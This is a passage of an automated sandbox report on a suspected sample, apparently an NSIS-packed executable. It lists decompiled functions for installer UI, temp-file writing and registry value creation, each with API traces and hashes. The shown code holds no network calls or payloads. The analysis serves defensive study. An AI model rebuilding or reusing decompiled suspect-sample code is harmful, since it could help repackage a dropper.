                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Char$Next$Prev
                                                                                        • String ID: "C:\Users\user\Desktop\SX365783909782021.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 589700163-3775646167
                                                                                        • Opcode ID: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                        • Instruction ID: 3b6179abbfe29fc78842bf11aa846075366cc437f950451d76d565b88bc2b460
                                                                                        • Opcode Fuzzy Hash: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                        • Instruction Fuzzy Hash: A0110861805B9129EB3227284C48BBB7F89CF66754F18447FD8C4722C2C67C5D429FAD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00403F7F, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00403F7F(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                        0x00403f91
                                                                                        0x00404025
                                                                                        0x00000000
                                                                                        0x00404025
                                                                                        0x00403fa2
                                                                                        0x00403fa6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403fac
                                                                                        0x00403fb5
                                                                                        0x00403fb8
                                                                                        0x00403fb8
                                                                                        0x00403fbe
                                                                                        0x00403fc4
                                                                                        0x00403fc4
                                                                                        0x00403fd0
                                                                                        0x00403fd6
                                                                                        0x00403fdd
                                                                                        0x00403fe0
                                                                                        0x00403fe3
                                                                                        0x00403fe5
                                                                                        0x00403fe5
                                                                                        0x00403fed
                                                                                        0x00403ff3
                                                                                        0x00403ff3
                                                                                        0x00403ffd
                                                                                        0x00404002
                                                                                        0x00404005
                                                                                        0x0040400a
                                                                                        0x0040400d
                                                                                        0x0040400d
                                                                                        0x0040401d
                                                                                        0x0040401d
                                                                                        0x00000000

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2320649405-0
                                                                                        • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                        • Instruction ID: 4cc26f8bf5fc777f430f8318c3ba194748f169832e683f7fcd21add738ba3f9d
                                                                                        • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                        • Instruction Fuzzy Hash: C221C371904705ABCB209F78DD08B4BBBF8AF40711F048A29F992F26E0C738E904CB55
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040267C, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 93%
                                                                                        			E0040267C(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029F6(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004056C6(_t52) == 0) {
					E004029F6(0xffffffed);
				}
				E0040581E(_t52);
				_t27 = E0040583D(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031F1(_t47);
						E004031BF(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F18(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004057FE( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F18(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                        0x0040267c
                                                                                        0x0040267e
                                                                                        0x0040268a
                                                                                        0x0040268d
                                                                                        0x00402697
                                                                                        0x0040269b
                                                                                        0x0040269b
                                                                                        0x004026a1
                                                                                        0x004026ae
                                                                                        0x004026b6
                                                                                        0x004026b9
                                                                                        0x004026bf
                                                                                        0x004026cd
                                                                                        0x004026d2
                                                                                        0x004026d6
                                                                                        0x004026d9
                                                                                        0x004026e2
                                                                                        0x004026ee
                                                                                        0x004026f2
                                                                                        0x004026f5
                                                                                        0x004026ff
                                                                                        0x0040271e
                                                                                        0x00402706
                                                                                        0x0040270b
                                                                                        0x00402713
                                                                                        0x00402716
                                                                                        0x0040271b
                                                                                        0x0040271b
                                                                                        0x00402725
                                                                                        0x00402725
                                                                                        0x00402737
                                                                                        0x0040273e
                                                                                        0x00402750
                                                                                        0x00402750
                                                                                        0x00402756
                                                                                        0x00402756
                                                                                        0x00402761
                                                                                        0x00402762
                                                                                        0x00402766
                                                                                        0x0040276a
                                                                                        0x00402770
                                                                                        0x00402770
                                                                                        0x00402777
                                                                                        0x00402164
                                                                                        0x0040288e
                                                                                        0x0040289a

                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                                                                        • GlobalFree.KERNEL32 ref: 00402725
                                                                                        • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                                                                        • GlobalFree.KERNEL32 ref: 0040273E
                                                                                        • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3294113728-0
                                                                                        • Opcode ID: bbe2febf2a7676208e468084a2903d6f0f847cdd20ad645bfaea5cc140744c11
                                                                                        • Instruction ID: 719c612f4f238206e278f6e296a81204df483451b361404a9b6a09c3536a307a
                                                                                        • Opcode Fuzzy Hash: bbe2febf2a7676208e468084a2903d6f0f847cdd20ad645bfaea5cc140744c11
                                                                                        • Instruction Fuzzy Hash: F831AD71C00128BBDF216FA4CD89DAE7E79EF08364F10423AF920772E0C6795D419BA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404F04, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00404F04(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405B88(0, _t39, 0x41fc78, 0x41fc78, _a4);
					}
					_t26 = lstrlenA(0x41fc78);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc78);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc78;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc78)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc78, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                        0x00404f0a
                                                                                        0x00404f16
                                                                                        0x00404f19
                                                                                        0x00404f1f
                                                                                        0x00404f2b
                                                                                        0x00404f2e
                                                                                        0x00404f31
                                                                                        0x00404f37
                                                                                        0x00404f37
                                                                                        0x00404f3d
                                                                                        0x00404f45
                                                                                        0x00404f48
                                                                                        0x00404f65
                                                                                        0x00404f69
                                                                                        0x00404f72
                                                                                        0x00404f72
                                                                                        0x00404f7c
                                                                                        0x00404f85
                                                                                        0x00404f91
                                                                                        0x00404f98
                                                                                        0x00404f9c
                                                                                        0x00404f9f
                                                                                        0x00404fb2
                                                                                        0x00404fc0
                                                                                        0x00404fc0
                                                                                        0x00404fc4
                                                                                        0x00404fc6
                                                                                        0x00404fc9
                                                                                        0x00000000
                                                                                        0x00404fc9
                                                                                        0x00404f4a
                                                                                        0x00404f52
                                                                                        0x00404f5a
                                                                                        0x00404f60
                                                                                        0x00000000
                                                                                        0x00404f60
                                                                                        0x00404f5a
                                                                                        0x00404f48
                                                                                        0x00404fd3

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                        • lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                        • lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                        • SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 2531174081-0
                                                                                        • Opcode ID: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
                                                                                        • Instruction ID: 33d69ec58002f5e3cec48cf4aa7ac502a1da6879986bf9ca4026f821734cd723
                                                                                        • Opcode Fuzzy Hash: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
                                                                                        • Instruction Fuzzy Hash: C4219D71A00108BBDF119FA5CD849DEBFB9EB49354F14807AFA04B6290C3389E45CBA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402BD3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00402BD3(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41704c; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41704c = 0;
					return _t15;
				}
				__eflags =  *0x41704c; // 0x0
				if(__eflags != 0) {
					return E00405EC1(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B3B, 0);
						 *0x41704c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BB7());
						return E00404F04(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                                        0x00402bdf
                                                                                        0x00402be1
                                                                                        0x00402be8
                                                                                        0x00402beb
                                                                                        0x00402beb
                                                                                        0x00402bf1
                                                                                        0x00000000
                                                                                        0x00402bf1
                                                                                        0x00402bf9
                                                                                        0x00402bff
                                                                                        0x00000000
                                                                                        0x00402c02
                                                                                        0x00402c09
                                                                                        0x00402c0f
                                                                                        0x00402c15
                                                                                        0x00402c17
                                                                                        0x00402c1d
                                                                                        0x00402c5b
                                                                                        0x00402c64
                                                                                        0x00000000
                                                                                        0x00402c69
                                                                                        0x00402c1f
                                                                                        0x00402c26
                                                                                        0x00402c37
                                                                                        0x00000000
                                                                                        0x00402c45
                                                                                        0x00402c26
                                                                                        0x00402c71

                                                                                        APIs
                                                                                        • DestroyWindow.USER32(00000000,00000000), ref: 00402BEB
                                                                                        • GetTickCount.KERNEL32 ref: 00402C09
                                                                                        • wsprintfA.USER32 ref: 00402C37
                                                                                          • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                          • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                          • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                          • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C5B
                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402C69
                                                                                          • Part of subcall function 00402BB7: MulDiv.KERNEL32(00000000,00000064,?), ref: 00402BCC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                        • String ID: ... %d%%
                                                                                        • API String ID: 722711167-2449383134
                                                                                        • Opcode ID: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                        • Instruction ID: c44cf6bb529b7c61e0c77009ed50883557557090b8ffabf6f859222ef57aaf40
                                                                                        • Opcode Fuzzy Hash: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                        • Instruction Fuzzy Hash: C6016170949210EBD7215F61EE4DA9F7B78AB04701B14403BF502B11E5C6BC9A01CBAE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004047D3, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004047D3(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                        0x004047e1
                                                                                        0x004047ee
                                                                                        0x004047f4
                                                                                        0x00404832
                                                                                        0x00404832
                                                                                        0x00404841
                                                                                        0x00404848
                                                                                        0x00000000
                                                                                        0x0040484a
                                                                                        0x004047f6
                                                                                        0x00404805
                                                                                        0x0040480d
                                                                                        0x00404810
                                                                                        0x00404822
                                                                                        0x00404828
                                                                                        0x0040482f
                                                                                        0x00000000
                                                                                        0x0040482f
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047EE
                                                                                        • GetMessagePos.USER32 ref: 004047F6
                                                                                        • ScreenToClient.USER32 ref: 00404810
                                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404822
                                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404848
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Message$Send$ClientScreen
                                                                                        • String ID: f
                                                                                        • API String ID: 41195575-1993550816
                                                                                        • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                        • Instruction ID: 01d6173a61c3c3b4b037133c9a52f1e04ee3049876a8ff08b59bebc5d15cf036
                                                                                        • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                        • Instruction Fuzzy Hash: BA018075D40218BADB00DB94CC41BFEBBBCAB55711F10412ABB00B61C0C3B46501CB95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402B3B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BB7();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                        0x00402b48
                                                                                        0x00402b56
                                                                                        0x00402b5c
                                                                                        0x00402b5c
                                                                                        0x00402b6a
                                                                                        0x00402b6c
                                                                                        0x00402b78
                                                                                        0x00402b7d
                                                                                        0x00402b7f
                                                                                        0x00402b7f
                                                                                        0x00402b8a
                                                                                        0x00402b9a
                                                                                        0x00402bac
                                                                                        0x00402bac
                                                                                        0x00402bb4

                                                                                        APIs
                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                                                                        • wsprintfA.USER32 ref: 00402B8A
                                                                                        • SetWindowTextA.USER32(?,?), ref: 00402B9A
                                                                                        • SetDlgItemTextA.USER32 ref: 00402BAC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                        • API String ID: 1451636040-1158693248
                                                                                        • Opcode ID: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                        • Instruction ID: 39266fd7d8b3d51d4259f470751267aa52f8e49dbca779dff7f29341b6a717b4
                                                                                        • Opcode Fuzzy Hash: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                        • Instruction Fuzzy Hash: AFF03671900109ABEF255F51DD0ABEE3779FB00305F008036FA05B51D1D7F9AA559F99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402303, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 90%
                                                                                        			E00402303(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402AEB(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029F6(2);
				_t18 = E004029F6(0x11);
				_t31 =  *0x423f50 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029F6(0x23);
						_t19 = lstrlenA(0x40a370) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029D9(3);
						 *0x40a370 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F18(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a370, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a370, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}










                                                                                        0x00402304
                                                                                        0x00402309
                                                                                        0x00402313
                                                                                        0x0040231d
                                                                                        0x00402320
                                                                                        0x00402330
                                                                                        0x0040233a
                                                                                        0x00402341
                                                                                        0x00402349
                                                                                        0x00402357
                                                                                        0x0040235b
                                                                                        0x00402366
                                                                                        0x00402366
                                                                                        0x0040236a
                                                                                        0x0040236e
                                                                                        0x00402374
                                                                                        0x00402379
                                                                                        0x00402379
                                                                                        0x0040237d
                                                                                        0x00402389
                                                                                        0x00402389
                                                                                        0x004023a2
                                                                                        0x004023a4
                                                                                        0x004023a4
                                                                                        0x004023a7
                                                                                        0x0040247d
                                                                                        0x0040247d
                                                                                        0x0040288e
                                                                                        0x0040289a

                                                                                        APIs
                                                                                        • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
                                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
                                                                                        • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CloseCreateValuelstrlen
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsvDA2D.tmp
                                                                                        • API String ID: 1356686001-3949453518
                                                                                        • Opcode ID: 7863a0f49a6f39dd7089a52df85a66d0e401da730b8a2c07c6ee90d0110cbeae
